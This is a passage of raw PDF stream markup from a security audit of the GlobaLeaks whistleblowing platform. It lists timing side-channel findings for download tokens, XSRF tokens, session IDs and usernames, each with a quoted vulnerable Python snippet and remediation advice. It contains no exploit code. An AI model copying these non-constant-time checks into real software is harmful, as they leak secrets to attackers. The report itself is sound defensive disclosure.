Tj T* ET Q Q q 1 0 0 1 62.69291 417.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation:) Tj T* ET Q Q q 1 0 0 1 62.69291 375.0236 cm q BT 1 0 0 1 0 26 Tm 1.720651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Timing attacks can be made slightly harder by requiring access to be through Tor. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node) Tj T* 0 Tw 1.496651 Tw (administrators may be able to detect side channel attacks by noticing an unusual amount of repetitive) Tj T* 0 Tw (requests.) Tj T* ET Q Q q 1 0 0 1 62.69291 357.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 327.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.643059 Tw (To eliminate side channels, eliminate varying-work operations that depend on a secret. These include) Tj T* 0 Tw (branches, array indices, and database lookups.) Tj T* ET Q Q q 1 0 0 1 62.69291 297.0236 cm q BT 1 0 0 1 0 14 Tm 1.664597 Tw 12 TL /F1 10 Tf 0 0 0 rg (To compare strings in constant time, use a vetted function such as ) Tj /F3 10 Tf (constant_time_compare ) Tj /F1 10 Tf (from) Tj T* 0 Tw 0 0 .501961 rg (Tahoe-LAFS) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 267.0236 cm q BT 1 0 0 1 0 14 Tm 1.312651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Remediation of data-structure side channels \(e.g. for the session token\) is an actively evolving area of) Tj T* 0 Tw (research; we have some ideas, left for future work.) Tj T* ET Q Q q 1 0 0 1 62.69291 237.0236 cm q BT 1 0 0 1 0 14 Tm 1.354692 Tw 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (The description of this vulnerability is incomplete. There is no proof of concept, but we do not) Tj T* 0 Tw (intend to make one.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 237.0236 cm Q endstream endobj % 'R368': class PDFStream 368 0 obj % page stream << /Length 3327 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.1: Timing Leak of File Download Token) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (File download tokens can leak via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to download submitted files.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .114751 Tw (The file download token is used as a key in the database to find the file to download. An attacker might be) Tj T* 0 Tw (able to measure the amount of time this takes to extract a valid file download token.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 464.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 108 re B* Q q BT 1 0 0 1 0 86 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (download_file) Tj 0 0 0 rg (\() Tj (store) Tj (,) Tj ( ) Tj (file_id) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* ( Auth temporary disabled, just Tip_id and File_id required) Tj T* ( """) Tj /F3 10 Tf 0 0 0 rg T* T* ( ) Tj (rfile) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (ReceiverFile) Tj (,) Tj T* ( ) Tj (ReceiverFile) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (unicode) Tj 0 0 0 rg (\() Tj (file_id) Tj (\)\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# ...) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 444.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 426.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 408.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 408.8236 cm Q endstream endobj % 'R369': class PDFStream 369 0 obj % page stream << /Length 3655 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.2: Timing Leak of Collection Download Token) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Collection download tokens may be leaked via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to download submitted files.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q BT 1 0 0 1 0 14 Tm .289987 Tw 12 TL /F1 10 Tf 0 0 0 rg (The collection download token is checked by looking it up in a ) Tj /F3 10 Tf (dict ) Tj /F1 10 Tf (hash table. The time taken depends) Tj T* 0 Tw (on what's already in the table. An attacker may be able to use this to extract a collection download ID.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 490.8262 cm q q .976496 0 0 .976496 0 0 cm q 1 0 0 1 6.6 6.758862 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 480 84 re B* Q q BT 1 0 0 1 0 62 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj (temporary_download_id) Tj (\):) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (temporary_download_id) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (in) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj (temporary_download_id) Tj (]) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_type) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('rtip') Tj 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (download_tokens) Tj ([) Tj (temporary_download_id) Tj (]) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (id_val) Tj T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 470.8262 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 452.8262 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 434.8262 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 434.8262 cm Q endstream endobj % 'R370': class PDFStream 370 0 obj % page stream << /Length 4139 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.3: Timing Leak of XSRF Token) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The XSRF token can leak via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (A cross-domain timing attack could be used to learn the user's XSRF token.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q BT 1 0 0 1 0 14 Tm 1.439398 Tw 12 TL /F1 10 Tf 0 0 0 rg (The XSRF token is checked with the ) Tj /F3 10 Tf (!= ) Tj /F1 10 Tf (operator, whose execution time varies with the length of the) Tj T* 0 Tw (common prefix of the two strings.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 452.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 120 re B* Q q BT 1 0 0 1 0 98 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (check_xsrf_cookie) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (\):) Tj T* ( ) Tj /F7 10 Tf .729412 .129412 .129412 rg (""") Tj T* ( Override needed to change name of header name) Tj T* ( """) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj (token) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (headers) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (get) Tj (\() Tj .729412 .129412 .129412 rg ("X-XSRF-TOKEN") Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (token) Tj (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (HTTPError) Tj (\() Tj .4 .4 .4 rg (403) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ("X-XSRF-TOKEN argument missing from POST") Tj 0 0 0 rg (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (xsrf_token) Tj ( ) Tj .4 .4 .4 rg (!=) Tj 0 0 0 rg ( ) Tj (token) Tj (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (raise) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (HTTPError) Tj (\() Tj .4 .4 .4 rg (403) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ("XSRF cookie does not match POST argument") Tj 0 0 0 rg (\)) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 432.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 414.8236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Remediation:) Tj T* ET Q Q q 1 0 0 1 62.69291 396.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Replace the comparison with ) Tj /F3 10 Tf (constant_time_compare ) Tj /F1 10 Tf (or equivalent \(see ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (\).) Tj T* ET Q Q q 1 0 0 1 62.69291 378.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists, assuming this code gets called.) Tj T* ET Q Q q 1 0 0 1 62.69291 378.8236 cm Q endstream endobj % 'R371': class PDFStream 371 0 obj % page stream << /Length 4081 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.4: Timing Leak of Session ID) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The session ID can leak via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract a session ID.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm q BT 1 0 0 1 0 14 Tm 2.238735 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (A user must be logged in \(an unexpired session\) at the same time an attacker) Tj T* 0 Tw (measures response times to the attacker's requests to the Node.) Tj T* ET Q Q q 1 0 0 1 62.69291 648.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 612.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 582.0236 cm q BT 1 0 0 1 0 14 Tm 1.344724 Tw 12 TL /F1 10 Tf 0 0 0 rg (The session ID is validated by looking it up in a ) Tj /F3 10 Tf (dict ) Tj /F1 10 Tf (hash table. The time taken depends on what's) Tj T* 0 Tw (already in the table; an attacker might be able to exploit this to extract a valid session ID.) Tj T* ET Q Q q 1 0 0 1 62.69291 392.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 180 re B* Q q BT 1 0 0 1 0 158 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@property) Tj 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (current_user) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (\):) Tj T* ( ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg T* T* ( ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (headers) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (get) Tj (\() Tj .729412 .129412 .129412 rg ('X-Session') Tj 0 0 0 rg (\)) Tj T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (session_id) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (try) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj (session) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (GLSetting) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (sessions) Tj ([) Tj (session_id) Tj (]) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (except) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .823529 .254902 .227451 rg (KeyError) Tj /F3 10 Tf 0 0 0 rg (:) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (None) Tj 0 0 0 rg T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (session) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 372.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Mitigation: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 354.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Remediation: ) Tj /F1 10 Tf (Remediation of this issue is ) Tj 0 0 .501961 rg (Future Work) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 336.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Status: ) Tj /F1 10 Tf (Not proven exploitable, but we are confident the channel exists.) Tj T* ET Q Q q 1 0 0 1 62.69291 336.8236 cm Q endstream endobj % 'R372': class PDFStream 372 0 obj % page stream << /Length 7907 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 750.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Issue J.5: Timing Leak of Usernames) Tj T* ET Q Q q 1 0 0 1 62.69291 732.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported ) Tj /F1 10 Tf (2014-02-21) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (Usernames and email addresses can leak via the timing side-channel.) Tj T* ET Q Q q 1 0 0 1 62.69291 684.0236 cm q BT 1 0 0 1 0 14 Tm 1.356235 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An attacker may be able to extract valid usernames. 
\(Note that a receiver's username is their) Tj T* 0 Tw (email address.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 654.0236 cm q BT 1 0 0 1 0 14 Tm 2.84152 Tw 12 TL /F2 10 Tf 0 0 0 rg (Attack Resources: ) Tj /F1 10 Tf (See ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw (Attacks) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 636.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (See ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 618.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Verified by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 600.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Vulnerability Description:) Tj T* ET Q Q q 1 0 0 1 62.69291 558.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .706488 Tw (When a user tries to log in as the Node administrator or receiver, a distinct code path is taken when the) Tj T* 0 Tw .402209 Tw (username is valid but the password is not. This causes the Node's response time to vary, which might let) Tj T* 0 Tw (an attacker confirm that an account exists, or extract a valid username.) Tj T* ET Q Q q 1 0 0 1 62.69291 540.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (See the ) Tj /F3 10 Tf (Note ) Tj /F1 10 Tf (comments added to the code below:) Tj T* ET Q Q q 1 0 0 1 62.69291 267.0277 cm q q .758866 0 0 .758866 0 0 cm q 1 0 0 1 6.6 8.697189 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 618 348 re B* Q q BT 1 0 0 1 0 326 Tm 12 TL /F3 10 Tf .666667 .133333 1 rg (@transact) Tj 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (login_receiver) Tj 0 0 0 rg (\() Tj (store) Tj (,) Tj ( ) Tj (username) Tj (,) Tj ( ) Tj (password) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: Username comparison in the database query leaks information.) 
Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj (receiver_user) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (store) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (find) Tj (\() Tj (User) Tj (,) Tj ( ) Tj (User) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (username) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (one) Tj (\(\)) Tj T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (receiver_user) Tj ( ) Tj /F6 10 Tf .666667 .133333 1 rg (or) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (role) Tj ( ) Tj .4 .4 .4 rg (!=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('receiver') Tj 0 0 0 rg (:) Tj T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: This path is taken when the user doesn't exist at all.) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj (log) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (debug) Tj (\() Tj .729412 .129412 .129412 rg ("Receiver: Fail auth, username ) Tj /F6 10 Tf .733333 .4 .533333 rg (%s) Tj /F3 10 Tf .729412 .129412 .129412 rg ( do not exists") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (%) Tj 0 0 0 rg ( ) Tj (username) Tj (\)) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (False) Tj 0 0 0 rg T* T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf .666667 .133333 1 rg (not) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (security) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (check_password) Tj (\() Tj (password) Tj (,) Tj ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (password) Tj (,) Tj ( ) Tj (receiver_user) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (salt) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# Note: This path is taken when the user DOES exist, but the) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# password is wrong. It does more stuff, so it probably) Tj /F3 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# takes longer to execute.) 
